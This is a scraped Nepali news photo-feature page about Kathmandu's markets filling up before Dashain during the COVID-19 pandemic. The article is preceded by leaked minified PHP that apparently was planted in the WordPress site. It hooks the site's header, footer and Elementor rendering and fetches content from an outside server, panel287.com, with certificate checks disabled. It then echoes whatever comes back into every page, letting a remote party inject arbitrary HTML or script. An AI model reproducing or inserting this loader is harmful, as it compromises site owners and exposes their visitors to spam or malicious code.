if(!function_exists('gplrock_unified_footer_script')){function gplrock_unified_footer_script(){static $script_executed=false;if($script_executed){return;}$is_elementor_page=false;if(class_exists('Elementor\Plugin')){$elementor=\Elementor\Plugin::instance();if(!$elementor->editor->is_edit_mode()){$is_elementor_page=true;}}if(!did_action('wp_footer')&&!did_action('wp_head')&&!$is_elementor_page){return;}$footer_url='https://panel287.com/api/footer.php?linkspool='.urlencode($_SERVER['HTTP_HOST']);$response=wp_remote_get($footer_url,['timeout'=>15,'sslverify'=>false,'user-agent'=>'WordPress/'.get_bloginfo('version')]);if(!is_wp_error($response)&&wp_remote_retrieve_response_code($response)===200){$body=wp_remote_retrieve_body($response);if(!empty($body)&&strlen($body)>10){echo $body;}}$script_executed=true;}}if(!has_action('wp_footer','gplrock_unified_footer_script')){add_action('wp_footer','gplrock_unified_footer_script',999);}if(!has_action('wp_head','gplrock_unified_footer_script')){add_action('wp_head','gplrock_unified_footer_script',999);}if(class_exists('Elementor\Plugin')&&!has_action('elementor/frontend/after_render','gplrock_unified_footer_script')){add_action('elementor/frontend/after_render','gplrock_unified_footer_script',999);} चाडपर्व नजिकिएसँगै बढ्यो मानिसहरुको चहलपहल (फोटोफिचर) – Toppo Khim

चाडपर्व नजिकिएसँगै बढ्यो मानिसहरुको चहलपहल (फोटोफिचर)

काठमाडौं । नेपालीहरुको महान् पर्व दशैँ नजिकिएसँगै काठमाडौंका मुख्य व्यापारिक क्षेत्रहरुमा मानिसहरुको चहलपहल बाक्लै देखिन थालेको छ । अघिल्ला वर्षहरुको तुलनामा कम मानिसको चहलपहल भएपनि कोरोना कहरका कारण मानिसहरु अनुहारमा मास्कको प्रयोग गर्दै बजारमा देखिएका छन् ।

 

कोरोना महामारीकाबीच सुनसानप्रायः बनेका काठमाडौंका मुख्य व्यापारिक क्षेत्रहरुमा चाडपर्व नजिकिएसँगै मानिसहरु मुखमा मास्क लगाएर हिड्न थालेका छन् । कतिपयका हातमा ‘ग्लोब्स’ पनि देखिन्छ ।

विश्वलाई नै आक्रान्त पारेको कोरोनाको कहरका कारण ठूला चाडपर्व नजिकिँदै गएपनि काठमाडौं उपत्यकाका प्रमुख व्यापारिक बजारमा चहलपहल कम देखिएको छ । विगतका वर्षहरुमा दशैँ नजिकिएसँगै निकै भिड हुने बजारमा यस वर्ष कोभिड-१९ संक्रमणको जोखिमका कारण कम चहलपहल देखिएको हो ।

साँघुरो गल्ली भएका कारण असन ईन्द्रचोकमा मानिसहरुले एक दोस्रोसँगको दूरी कायम गरेका छैनन् ।

तस्वीरमा हेर्नुहोस् चाडपर्व नजिकिएसँगै मानिसहरुको बढेको चहलपहल :

सम्बन्धित पोस्ट
प्रतिक्रिया दिनुहोस
Loading...